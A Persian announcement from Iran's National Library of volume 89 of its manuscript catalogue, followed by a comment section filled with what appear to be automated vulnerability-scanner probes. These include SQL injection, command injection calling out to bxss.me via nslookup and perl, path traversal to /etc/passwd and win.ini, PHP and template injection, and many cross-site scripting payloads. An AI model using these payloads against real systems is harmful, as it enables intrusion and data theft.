تازه های نشر

1399/08/10 شنبه

انتشارات سازمان اسناد و کتابخانه‌ ملّی جمهوری اسلامی ایران، جلد 89 «فهرست نسخ خطی سازمان اسناد و کتابخانه ملّی جمهوری اسلامی ایران» را در 728 صفحه چاپ و روانه بازار نشر کرد. تحقیق و تالیف این فهرست را «پروین متواری‌سورکی» انجام داده‌اند. با انتشار این فهرست تعداد منشورات سازمان به 1566 جلد و تعداد فهرست‌های نسخه‌های خطی منتشر شده کتابخانه ملی ایران به 50 جلد رسید.

در این فهرست 300 نسخه خطی فارسی و عربی (از شماره 30601 تا 30900) از گنجینه نسخه‌های خطی کتابخانه ملّی ایران معرفی شده است. در تهیه این فهرست، از قواعد استاندارد فهرست‌نویسی برای یکدست‌سازی اطلاعات نسخه‌های خطی استفاده شده و این اطلاعات در دو بخش کتابشناسی و نسخه‌شناسی ارائه گردیده است.

علاقه‌مندان جهت تهیه این اثر می‌توانند از طریق مراجعه به فروشگاه انتشارات سازمان واقع در ساختمان کتابخانه ملی ایران، فروشگاه مجازی سازمان به آدرس http://bookshop.nlai.ir اقدام نمایند و یا با شمارة تلفن 81623277 تماس بگیرند

ثبت نظر
نظرات
05/08/1400 02:47 ب.ظ
Mr.

sFkcVmE5

05/08/1400 02:47 ب.ظ
Mr.

1*

05/08/1400 02:47 ب.ظ
Mr.

1*

05/08/1400 02:47 ب.ظ
Mr.

1*

05/08/1400 02:47 ب.ظ
Mr.

1*

05/08/1400 02:47 ب.ظ
Mr.

-1 OR 2+524-524-1=0+0+0+1

05/08/1400 02:47 ب.ظ
Mr.

-1 OR 3+524-524-1=0+0+0+1

05/08/1400 02:47 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 02:47 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 02:47 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 02:47 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

05/08/1400 02:47 ب.ظ
Mr.

-1; waitfor delay '0:0:15' --

05/08/1400 02:47 ب.ظ
Mr.

-1); waitfor delay '0:0:15' --

05/08/1400 02:47 ب.ظ
Mr.

-1)); waitfor delay '0:0:15' --

05/08/1400 02:47 ب.ظ
Mr.

1 waitfor delay '0:0:15' --

05/08/1400 02:47 ب.ظ
Mr.

qcPLgi6k'; waitfor delay '0:0:15' --

05/08/1400 02:47 ب.ظ
Mr.

vhq4xKud'); waitfor delay '0:0:15' --

05/08/1400 02:47 ب.ظ
Mr.

QPKL06E6')); waitfor delay '0:0:15' --

05/08/1400 02:47 ب.ظ
Mr.

-5 OR 755=(SELECT 755 FROM PG_SLEEP(15))--

05/08/1400 02:47 ب.ظ
Mr.

-5) OR 228=(SELECT 228 FROM PG_SLEEP(15))--

05/08/1400 02:47 ب.ظ
Mr.

-1)) OR 178=(SELECT 178 FROM PG_SLEEP(15))--

05/08/1400 02:47 ب.ظ
Mr.

7jnSvlVm' OR 684=(SELECT 684 FROM PG_SLEEP(15))--

05/08/1400 02:47 ب.ظ
Mr.

YwMNnXar') OR 625=(SELECT 625 FROM PG_SLEEP(15))--

05/08/1400 02:47 ب.ظ
Mr.

RXECAGEa')) OR 862=(SELECT 862 FROM PG_SLEEP(15))--

05/08/1400 02:47 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 02:47 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 02:47 ب.ظ
Mr.

1'"

05/08/1400 02:47 ب.ظ
Mr.

1����%2527%2522

05/08/1400 02:47 ب.ظ
Mr.

@@sFTDR

05/08/1400 03:54 ب.ظ
Mr.

response.write(9143148*9193043)

05/08/1400 03:54 ب.ظ
Mr.

'+response.write(9143148*9193043)+'

05/08/1400 03:54 ب.ظ
Mr.

"+response.write(9143148*9193043)+"

05/08/1400 03:54 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 03:54 ب.ظ
Mr.

echo ufjzmz$()\ nysndb\nz^xyu||a #' &echo ufjzmz$()\ nysndb\nz^xyu||a #|" &echo ufjzmz$()\ nysndb\nz^xyu||a #

05/08/1400 03:54 ب.ظ
Mr.

&echo prncaw$()\ qhewhq\nz^xyu||a #' &echo prncaw$()\ qhewhq\nz^xyu||a #|" &echo prncaw$()\ qhewhq\nz^xyu||a #

05/08/1400 03:54 ب.ظ
Mr.

|echo exglcl$()\ rekske\nz^xyu||a #' |echo exglcl$()\ rekske\nz^xyu||a #|" |echo exglcl$()\ rekske\nz^xyu||a #

05/08/1400 03:54 ب.ظ
Mr.

(nslookup hitssoxmmkgib734ab.bxss.me||perl -e "gethostbyname('hitssoxmmkgib734ab.bxss.me')")

05/08/1400 03:54 ب.ظ
Mr.

$(nslookup hitwbcfyazkzda24af.bxss.me||perl -e "gethostbyname('hitwbcfyazkzda24af.bxss.me')")

05/08/1400 03:54 ب.ظ
Mr.

&(nslookup hitbsmribtzjiafe7a.bxss.me||perl -e "gethostbyname('hitbsmribtzjiafe7a.bxss.me')")&'\"`0&(nslookup hitbsmribtzjiafe7a.bxss.me||perl -e "gethostbyname('hitbsmribtzjiafe7a.bxss.me')")&`'

05/08/1400 03:54 ب.ظ
Mr.

|(nslookup hitqkyouzxyvnce871.bxss.me||perl -e "gethostbyname('hitqkyouzxyvnce871.bxss.me')")

05/08/1400 03:54 ب.ظ
Mr.

`(nslookup hithntrlxmzatc9b45.bxss.me||perl -e "gethostbyname('hithntrlxmzatc9b45.bxss.me')")`

05/08/1400 03:54 ب.ظ
Mr.

;(nslookup hitoqdorkabiu0d4dc.bxss.me||perl -e "gethostbyname('hitoqdorkabiu0d4dc.bxss.me')")|(nslookup hitoqdorkabiu0d4dc.bxss.me||perl -e "gethostbyname('hitoqdorkabiu0d4dc.bxss.me')")&(nslookup hitoqdorkabiu0d4dc.bxss.me||perl -e "gethostbyname('hitoqdorkabiu0d4dc.bxss.me')")

05/08/1400 03:54 ب.ظ
Mr.

JbI9KhzZ

05/08/1400 03:54 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 03:54 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 03:54 ب.ظ
Mr.

../

05/08/1400 03:54 ب.ظ
Mr.

./

05/08/1400 03:55 ب.ظ
Mr.

12345'"\'\");|]*{
<>�''💡

05/08/1400 03:55 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 03:55 ب.ظ
Mr.

${10000196+9999689}

05/08/1400 03:55 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 03:55 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 03:55 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 03:55 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 03:55 ب.ظ
Mr.

bxss.me

05/08/1400 03:55 ب.ظ
Mr.

&n983445=v990935

05/08/1400 03:55 ب.ظ
Mr.

)

05/08/1400 03:55 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 03:55 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 03:55 ب.ظ
Mr.

'"()

05/08/1400 03:55 ب.ظ
Mr.

'.gethostbyname(lc('hityf'.'trwppwtbf0031.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(81).chr(106).chr(88).'

05/08/1400 03:55 ب.ظ
Mr.

".gethostbyname(lc("hitjp"."dxyrlsmf8913c.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(75).chr(100).chr(77)."

05/08/1400 03:56 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 03:56 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 03:56 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 03:56 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 03:56 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 03:56 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 03:56 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 03:56 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 03:56 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 03:56 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(101).concat(74).concat(114).concat(84)+(require"socket"
Socket.gethostbyname("hittw"+"obdkdcju2c19f.bxss.me.")[3].to_s)+"

05/08/1400 03:56 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(120).concat(72).concat(115).concat(75)+(require'socket'
Socket.gethostbyname('hitxb'+'felzwwqx3b758.bxss.me.')[3].to_s)+'

05/08/1400 03:56 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8

05/08/1400 03:56 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8

05/08/1400 03:56 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8/.

05/08/1400 03:56 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 03:56 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 03:56 ب.ظ
Mr.

'"

05/08/1400 03:56 ب.ظ
Mr.

<!--

05/08/1400 03:56 ب.ظ
Mr.

'"()&%<acx><ScRiPt >sRTf(9171)</ScRiPt>

05/08/1400 03:56 ب.ظ
Mr.

'"()&%<acx><ScRiPt >sRTf(9501)</ScRiPt>

05/08/1400 03:56 ب.ظ
Mr.

1DnQTQCce8O

05/08/1400 03:56 ب.ظ
Mr.

9629323

05/08/1400 03:56 ب.ظ
Mr.

acu4002<s1﹥s2ʺs3ʹuca4002

05/08/1400 03:56 ب.ظ
Mr.

acux10983��z1��z2a�bcxuca10983

05/08/1400 03:56 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 03:56 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 03:57 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 03:57 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 03:57 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 03:57 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 03:57 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 03:57 ب.ظ
Mr.

<ScRiPt >sRTf(9027)</ScRiPt>

05/08/1400 03:57 ب.ظ
Mr.

<WPWJAS>BF0DJ[!+!]</WPWJAS>

05/08/1400 03:57 ب.ظ
Mr.

<script>sRTf(9537)</script>

05/08/1400 03:57 ب.ظ
Mr.

<ScR<ScRiPt>IpT>sRTf(9771)</sCr<ScRiPt>IpT>

05/08/1400 03:57 ب.ظ
Mr.

<ScRiPt
>sRTf(9205)</ScRiPt>

05/08/1400 03:57 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9726></ScRiPt>

05/08/1400 03:57 ب.ظ
Mr.

<ScRiPt
>sRTf(9262)</ScRiPt>

05/08/1400 03:57 ب.ظ
Mr.

<svg  

�onload=sRTf(9451);>

05/08/1400 03:57 ب.ظ
Mr.

<isindex type=image src=1 onerror=sRTf(9589)>

05/08/1400 03:57 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9167'>

05/08/1400 03:57 ب.ظ
Mr.

<body onload=sRTf(9720)>

05/08/1400 03:57 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=sRTf(9332)>

05/08/1400 03:57 ب.ظ
Mr.

<img src=xyz OnErRor=sRTf(9070)>

05/08/1400 03:57 ب.ظ
Mr.

<img/src=">" onerror=alert(9626)>

05/08/1400 03:57 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%73%52%54%66%289474%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 03:57 ب.ظ
Mr.

\u003CScRiPt\sRTf(9569)\u003C/sCripT\u003E

05/08/1400 03:57 ب.ظ
Mr.

&lt;ScRiPt&gt;sRTf(9298)&lt;/sCripT&gt;

05/08/1400 03:57 ب.ظ
Mr.

�<img acu onmouseover=sRTf(92131) //�>

05/08/1400 03:57 ب.ظ
Mr.

<input autofocus onfocus=sRTf(9871)>

05/08/1400 03:57 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 03:57 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 03:57 ب.ظ
Mr.

}body{acu:Expre/**/SSion(sRTf(9292))}

05/08/1400 03:58 ب.ظ
Mr.

<% contenteditable onresize=sRTf(9189)>

05/08/1400 03:58 ب.ظ
Mr.

3RFCO
<ScRiPt >sRTf(9325)</ScRiPt>

05/08/1400 03:58 ب.ظ
Mr.

<WMGG98>SBUDR[!+!]</WMGG98>

05/08/1400 03:58 ب.ظ
Mr.

<ifRAme sRc=9275.com></IfRamE>

05/08/1400 03:58 ب.ظ
Mr.

<TxRutK x=9613>

05/08/1400 03:58 ب.ظ
Mr.

<img sRc='http://attacker-9355/log.php?

05/08/1400 03:58 ب.ظ
Mr.

<5D0YS8<

05/08/1400 04:07 ب.ظ
Mr.

A3PxQMRH

05/08/1400 04:07 ب.ظ
Mr.

1*

05/08/1400 04:07 ب.ظ
Mr.

1*

05/08/1400 04:07 ب.ظ
Mr.

1*

05/08/1400 04:07 ب.ظ
Mr.

1*

05/08/1400 04:07 ب.ظ
Mr.

-1 OR 2+51-51-1=0+0+0+1

05/08/1400 04:07 ب.ظ
Mr.

-1 OR 3+51-51-1=0+0+0+1

05/08/1400 04:07 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 04:07 ب.ظ
Mr.

response.write(9148873*9069799)

05/08/1400 04:07 ب.ظ
Mr.

'+response.write(9148873*9069799)+'

05/08/1400 04:07 ب.ظ
Mr.

"+response.write(9148873*9069799)+"

05/08/1400 04:07 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 04:07 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 04:07 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

05/08/1400 04:07 ب.ظ
Mr.

-1; waitfor delay '0:0:15' --

05/08/1400 04:07 ب.ظ
Mr.

-1); waitfor delay '0:0:15' --

05/08/1400 04:07 ب.ظ
Mr.

-1)); waitfor delay '0:0:15' --

05/08/1400 04:07 ب.ظ
Mr.

1 waitfor delay '0:0:15' --

05/08/1400 04:07 ب.ظ
Mr.

UFBes05P'; waitfor delay '0:0:15' --

05/08/1400 04:07 ب.ظ
Mr.

LNTCFlui'); waitfor delay '0:0:15' --

05/08/1400 04:07 ب.ظ
Mr.

kkMeDXqI')); waitfor delay '0:0:15' --

05/08/1400 04:07 ب.ظ
Mr.

-5 OR 584=(SELECT 584 FROM PG_SLEEP(15))--

05/08/1400 04:07 ب.ظ
Mr.

-5) OR 441=(SELECT 441 FROM PG_SLEEP(15))--

05/08/1400 04:07 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 04:07 ب.ظ
Mr.

-1)) OR 890=(SELECT 890 FROM PG_SLEEP(15))--

05/08/1400 04:07 ب.ظ
Mr.

y3Z01jVm' OR 494=(SELECT 494 FROM PG_SLEEP(15))--

05/08/1400 04:07 ب.ظ
Mr.

qwBqxzoD') OR 174=(SELECT 174 FROM PG_SLEEP(15))--

05/08/1400 04:07 ب.ظ
Mr.

jywnuqvA')) OR 379=(SELECT 379 FROM PG_SLEEP(15))--

05/08/1400 04:07 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 04:07 ب.ظ
Mr.

echo ldllty$()\ pellsg\nz^xyu||a #' &echo ldllty$()\ pellsg\nz^xyu||a #|" &echo ldllty$()\ pellsg\nz^xyu||a #

05/08/1400 04:07 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 04:07 ب.ظ
Mr.

&echo ikylfs$()\ qlyavi\nz^xyu||a #' &echo ikylfs$()\ qlyavi\nz^xyu||a #|" &echo ikylfs$()\ qlyavi\nz^xyu||a #

05/08/1400 04:07 ب.ظ
Mr.

|echo agxlwi$()\ hstkon\nz^xyu||a #' |echo agxlwi$()\ hstkon\nz^xyu||a #|" |echo agxlwi$()\ hstkon\nz^xyu||a #

05/08/1400 04:07 ب.ظ
Mr.

(nslookup hitydtkfdewnt60f32.bxss.me||perl -e "gethostbyname('hitydtkfdewnt60f32.bxss.me')")

05/08/1400 04:07 ب.ظ
Mr.

$(nslookup hitjujgcfqfbb7b5a4.bxss.me||perl -e "gethostbyname('hitjujgcfqfbb7b5a4.bxss.me')")

05/08/1400 04:07 ب.ظ
Mr.

&(nslookup hitsmdqbnbrsdafba3.bxss.me||perl -e "gethostbyname('hitsmdqbnbrsdafba3.bxss.me')")&'\"`0&(nslookup hitsmdqbnbrsdafba3.bxss.me||perl -e "gethostbyname('hitsmdqbnbrsdafba3.bxss.me')")&`'

05/08/1400 04:07 ب.ظ
Mr.

|(nslookup hitsngycsxkdb70ee4.bxss.me||perl -e "gethostbyname('hitsngycsxkdb70ee4.bxss.me')")

05/08/1400 04:07 ب.ظ
Mr.

`(nslookup hitodshbahvme1caf0.bxss.me||perl -e "gethostbyname('hitodshbahvme1caf0.bxss.me')")`

05/08/1400 04:07 ب.ظ
Mr.

;(nslookup hitxfuzpbphqm76c8a.bxss.me||perl -e "gethostbyname('hitxfuzpbphqm76c8a.bxss.me')")|(nslookup hitxfuzpbphqm76c8a.bxss.me||perl -e "gethostbyname('hitxfuzpbphqm76c8a.bxss.me')")&(nslookup hitxfuzpbphqm76c8a.bxss.me||perl -e "gethostbyname('hitxfuzpbphqm76c8a.bxss.me')")

05/08/1400 04:07 ب.ظ
Mr.

1'"

05/08/1400 04:07 ب.ظ
Mr.

1����%2527%2522

05/08/1400 04:07 ب.ظ
Mr.

@@84NUY

05/08/1400 04:08 ب.ظ
Mr.

PQfffqQP

05/08/1400 04:08 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 04:09 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 04:09 ب.ظ
Mr.

12345'"\'\");|]*{
<>�''💡

05/08/1400 04:09 ب.ظ
Mr.

../

05/08/1400 04:09 ب.ظ
Mr.

./

05/08/1400 04:09 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 04:09 ب.ظ
Mr.

${9999829+9999343}

05/08/1400 04:09 ب.ظ
Mr.

)

05/08/1400 04:09 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 04:09 ب.ظ
Mr.

&n979829=v974307

05/08/1400 04:09 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 04:09 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 04:09 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 04:09 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 04:09 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 04:09 ب.ظ
Mr.

bxss.me

05/08/1400 04:09 ب.ظ
Mr.

'"()

05/08/1400 04:10 ب.ظ
Mr.

'.gethostbyname(lc('hitjg'.'bcvtzvbx6f478.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(80).chr(102).chr(90).'

05/08/1400 04:10 ب.ظ
Mr.

".gethostbyname(lc("hitmp"."wmglgwgr5a071.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(81).chr(104).chr(81)."

05/08/1400 04:10 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 04:10 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 04:10 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 04:10 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 04:10 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 04:10 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 04:10 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 04:10 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 04:10 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 04:10 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(122).concat(70).concat(110).concat(76)+(require"socket"
Socket.gethostbyname("hitdw"+"vemdtory03205.bxss.me.")[3].to_s)+"

05/08/1400 04:10 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(122).concat(78).concat(101).concat(84)+(require'socket'
Socket.gethostbyname('hitsd'+'pyqpekmwe91b0.bxss.me.')[3].to_s)+'

05/08/1400 04:10 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8

05/08/1400 04:10 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8

05/08/1400 04:10 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8/.

05/08/1400 04:10 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 04:10 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 04:10 ب.ظ
Mr.

'"()&%<acx><ScRiPt >6tO8(9042)</ScRiPt>

05/08/1400 04:10 ب.ظ
Mr.

'"

05/08/1400 04:10 ب.ظ
Mr.

<!--

05/08/1400 04:10 ب.ظ
Mr.

'"()&%<acx><ScRiPt >6tO8(9322)</ScRiPt>

05/08/1400 04:11 ب.ظ
Mr.

'"()&%<acx><ScRiPt >5bkR(9909)</ScRiPt>

05/08/1400 04:11 ب.ظ
Mr.

9245937

05/08/1400 04:11 ب.ظ
Mr.

'"()&%<acx><ScRiPt >5bkR(9086)</ScRiPt>

05/08/1400 04:11 ب.ظ
Mr.

acu3022<s1﹥s2ʺs3ʹuca3022

05/08/1400 04:11 ب.ظ
Mr.

acux4375��z1��z2a�bcxuca4375

05/08/1400 04:11 ب.ظ
Mr.

9857418

05/08/1400 04:11 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 04:11 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 04:11 ب.ظ
Mr.

acu7837<s1﹥s2ʺs3ʹuca7837

05/08/1400 04:11 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 04:11 ب.ظ
Mr.

acux9008��z1��z2a�bcxuca9008

05/08/1400 04:11 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 04:11 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 04:11 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 04:11 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 04:11 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 04:11 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 04:11 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 04:11 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 04:12 ب.ظ
Mr.

<ScRiPt >6tO8(9663)</ScRiPt>

05/08/1400 04:12 ب.ظ
Mr.

<WKRO7P>OARVJ[!+!]</WKRO7P>

05/08/1400 04:12 ب.ظ
Mr.

<script>6tO8(9091)</script>

05/08/1400 04:12 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 04:12 ب.ظ
Mr.

<ScR<ScRiPt>IpT>6tO8(9100)</sCr<ScRiPt>IpT>

05/08/1400 04:12 ب.ظ
Mr.

<ScRiPt
>6tO8(9152)</ScRiPt>

05/08/1400 04:12 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9780></ScRiPt>

05/08/1400 04:12 ب.ظ
Mr.

<ScRiPt
>6tO8(9218)</ScRiPt>

05/08/1400 04:12 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 04:12 ب.ظ
Mr.

<svg  

�onload=6tO8(9633);>

05/08/1400 04:12 ب.ظ
Mr.

<isindex type=image src=1 onerror=6tO8(9248)>

05/08/1400 04:12 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 04:12 ب.ظ
Mr.

<ScRiPt >5bkR(9998)</ScRiPt>

05/08/1400 04:12 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9664'>

05/08/1400 04:12 ب.ظ
Mr.

<body onload=6tO8(9898)>

05/08/1400 04:12 ب.ظ
Mr.

<WQ9QJB>4TUUR[!+!]</WQ9QJB>

05/08/1400 04:12 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=6tO8(9994)>

05/08/1400 04:12 ب.ظ
Mr.

<script>5bkR(9355)</script>

05/08/1400 04:12 ب.ظ
Mr.

<img src=xyz OnErRor=6tO8(9541)>

05/08/1400 04:13 ب.ظ
Mr.

<img/src=">" onerror=alert(9155)>

05/08/1400 04:13 ب.ظ
Mr.

%0D%0A%0D%0A%3C%53%63%52%69%50%74%20%3E%36%74%4F%38%289834%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 04:13 ب.ظ
Mr.

\u003CScRiPt\6tO8(9701)\u003C/sCripT\u003E

05/08/1400 04:13 ب.ظ
Mr.

&lt;ScRiPt&gt;6tO8(9789)&lt;/sCripT&gt;

05/08/1400 04:13 ب.ظ
Mr.

<ScR<ScRiPt>IpT>5bkR(9350)</sCr<ScRiPt>IpT>

05/08/1400 04:13 ب.ظ
Mr.

�<img acu onmouseover=6tO8(99961) //�>

05/08/1400 04:13 ب.ظ
Mr.

<ScRiPt
>5bkR(9010)</ScRiPt>

05/08/1400 04:13 ب.ظ
Mr.

<input autofocus onfocus=6tO8(9414)>

05/08/1400 04:13 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 04:13 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9616></ScRiPt>

05/08/1400 04:13 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 04:13 ب.ظ
Mr.

}body{acu:Expre/**/SSion(6tO8(9983))}

05/08/1400 04:13 ب.ظ
Mr.

<ScRiPt
>5bkR(9237)</ScRiPt>

05/08/1400 04:13 ب.ظ
Mr.

<% contenteditable onresize=6tO8(9140)>

05/08/1400 04:13 ب.ظ
Mr.

<svg  

�onload=5bkR(9741);>

05/08/1400 04:13 ب.ظ
Mr.

dWjGZ
<ScRiPt >6tO8(9503)</ScRiPt>

05/08/1400 04:13 ب.ظ
Mr.

<isindex type=image src=1 onerror=5bkR(9371)>

05/08/1400 04:13 ب.ظ
Mr.

<WXSJMA>7XQJM[!+!]</WXSJMA>

05/08/1400 04:13 ب.ظ
Mr.

<ifRAme sRc=9083.com></IfRamE>

05/08/1400 04:13 ب.ظ
Mr.

<nSBFtG x=9946>

05/08/1400 04:14 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9324'>

05/08/1400 04:14 ب.ظ
Mr.

<img sRc='http://attacker-9406/log.php?

05/08/1400 04:14 ب.ظ
Mr.

<body onload=5bkR(9554)>

05/08/1400 04:14 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=5bkR(9618)>

05/08/1400 04:14 ب.ظ
Mr.

<img src=xyz OnErRor=5bkR(9450)>

05/08/1400 04:14 ب.ظ
Mr.

<zSP9Hx<

05/08/1400 04:14 ب.ظ
Mr.

<img/src=">" onerror=alert(9888)>

05/08/1400 04:14 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%35%62%6B%52%289461%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 04:14 ب.ظ
Mr.

\u003CScRiPt\5bkR(9097)\u003C/sCripT\u003E

05/08/1400 04:14 ب.ظ
Mr.

&lt;ScRiPt&gt;5bkR(9464)&lt;/sCripT&gt;

05/08/1400 04:15 ب.ظ
Mr.

�<img acu onmouseover=5bkR(95661) //�>

05/08/1400 04:15 ب.ظ
Mr.

